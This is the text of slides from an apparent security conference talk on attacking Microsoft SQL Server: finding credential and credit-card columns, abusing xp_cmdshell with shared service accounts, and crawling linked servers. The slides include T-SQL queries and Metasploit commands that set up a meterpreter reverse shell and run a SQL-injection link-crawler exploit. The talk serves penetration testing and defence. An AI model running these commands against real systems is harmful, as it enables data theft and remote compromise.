  • 46. Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
  • 47. Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
  • 48. Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
  • 49. Finding Data: Module Output asef
  • 51. Do a crazy cat disco dance!
  • 53. Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
  • 54. Shared Service Accounts: Diagram asef
  • 55. Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
  • 57. Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
  • 58. Database Link Crawling: Diagram asef
  • 59. Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
  • 60. Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
  • 61. Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
  • 62. Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
  • 63. Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
  • 64. Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
  • 65. Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
  • 66. Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
  • 67. Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
  • 68. Database Link Crawling: Attack! asef
  • 70. Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
  • 71. Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
  • 72. Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
  • 73. Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
  • 74. Conclusions Configure SMB SIGNING
  • 75. Conclusions don’t do DRUGS
  • 76. Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012